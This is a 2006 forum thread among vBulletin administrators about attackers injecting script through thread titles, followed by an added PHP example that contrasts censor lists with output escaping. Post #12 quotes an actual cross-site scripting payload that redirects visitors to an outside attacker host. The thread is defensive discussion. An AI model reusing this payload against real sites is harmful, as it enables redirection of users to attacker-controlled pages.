  #11  
Old 09-05-2006, 04:19 PM
optrex optrex is offline
 
Join Date: Sep 2005
Posts: 344

Have you let cyb know ???
Reply With Quote
  #12  
Old 09-05-2006, 04:20 PM
TorGa3iGhT TorGa3iGhT is offline
 
Join Date: Jun 2005
Posts: 26

I posted it in his thread... for this hack I mean... I didn't PM him or anything though

--------------
AHHHH!!! Someone tried it AGAIN while I was sitting there blocking everything. Luckily I disabled the plugin and nothing happened, but here's the line of text they used this time... I'm a lil scared to find out what that would have done, since it was executing a script file:

Code:
">"">>>><script>location="http://intikam.us/hck"</script> """" >
Reply With Quote
  #13  
Old 09-06-2006, 03:18 AM
Phaedrus Phaedrus is offline
 
Join Date: Jul 2006
Location: Colorado
Posts: 617

You need to delete the Thread title when deleting the post... Edit it and make it so that the redirect isn't there anymore and this will end your admin being redirected. Somewhere you have HTML on...
Reply With Quote
  #14  
Old 09-06-2006, 02:18 PM
roni1015 roni1015 is offline
 
Join Date: Dec 2005
Posts: 25

I've had this happen as well. What I don't understand is why people even bother doing this? It's the stupidest thing. What an enormous waste of their time to search out all these boards, register and then post this stupid title. All a person has to do is delete the stupid post and it's fixed. <sarcasm>Wow, those hackers are pretty smart, I know I'm impressed. </sarcasm> *rolling eyes* Sorry, just needed to rant there for a second about these little twits making our lives more difficult.

Anyway, I found a thread on here the other day about this where someone suggested to add that string they are using to the list of censored words and so I did that since it seemed like the quickest way to deal with this. So far, that has worked like a charm. I had one this morning actually, it ended up being a few of these ">"">> and then a whole bunch of these ************. So, it didn't work for them. Hehe.
Reply With Quote
  #15  
Old 09-06-2006, 05:17 PM
optrex optrex is offline
 
Join Date: Sep 2005
Posts: 344

Just moderate new users. They post as soon as they have activated the email, so the posts end up in a moderation queue. Then all you have to do is delete

Adding words to a censored list will only stop this variant of attack, it won't stop HTML being used in the first place - therefore the vulnerability is still open!
Reply With Quote
  #16  
Old 09-06-2006, 11:21 PM
Phaedrus Phaedrus is offline
 
Join Date: Jul 2006
Location: Colorado
Posts: 617

Quote:
Originally Posted by optrex
Just moderate new users. They post as soon as they have activated the email, so the posts end up in a moderation queue. Then all you have to do is delete

Adding words to a censored list will only stop this variant of attack, it won't stop HTML being used in the first place - therefore the vulnerability is still open!
Or at least have it censor the carets >><<
Reply With Quote
  #17  
Old 09-08-2006, 04:16 PM
Greek76 Greek76 is offline
 
Join Date: Aug 2006
Location: Planet Earth
Posts: 440

What if you add HTML phrases to your censors? Example: maybe html, .exe, etc... That might actually work. I found the best way to stop stuff like this is to set user registration to admin and pay attention to their email address; if it looks fishy, don't activate their account.
Reply With Quote
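
The point argued in posts #15 to #17, as an added example that is not part of the thread and is not vBulletin or plugin code: a censored-words list only rewrites the strings it knows, while encoding the title at output time handles any markup. `censor_title()` and `escape_title()` are hypothetical helpers, and the sample titles and the `example.invalid` URL are constructed.

```php
<?php
// Added example, not vBulletin or plugin code. censor_title() is a
// hypothetical stand-in for a censored-words list.

// Replace each censored word with asterisks of the same length.
function censor_title(string $title, array $censored): string
{
    foreach ($censored as $word) {
        $title = str_ireplace($word, str_repeat('*', strlen($word)), $title);
    }
    return $title;
}

// Encode HTML metacharacters at output time, so the browser shows the
// title as text whatever it contains.
function escape_title(string $title): string
{
    return htmlspecialchars($title, ENT_QUOTES, 'UTF-8');
}

// Constructed sample titles; the URL is a placeholder.
$titles = [
    'seen'    => '">"">>>><script>location="http://example.invalid/"</script> """" >',
    'variant' => '"><b>different markup, nothing on the censor list</b>',
];
$censored = ['<script>location="http://example.invalid/"</script>'];

foreach ($titles as $name => $title) {
    $afterCensor = censor_title($title, $censored);
    $afterEscape = escape_title($title);
    printf("%s\n  censored: %s\n  escaped:  %s\n", $name, $afterCensor, $afterEscape);
    // Raw angle brackets or quotes left in the output can still close the
    // surrounding attribute or tag and start new markup.
    printf("  raw metacharacters after censor: %s, after escape: %s\n",
        preg_match('/[<>"\']/', $afterCensor) ? 'yes' : 'no',
        preg_match('/[<>"\']/', $afterEscape) ? 'yes' : 'no');
}
```

The censored title still carries the leading quotes and angle brackets, which matches what post #14 reports seeing, and the second title passes the censor unchanged; the escaped form of both contains no raw metacharacters.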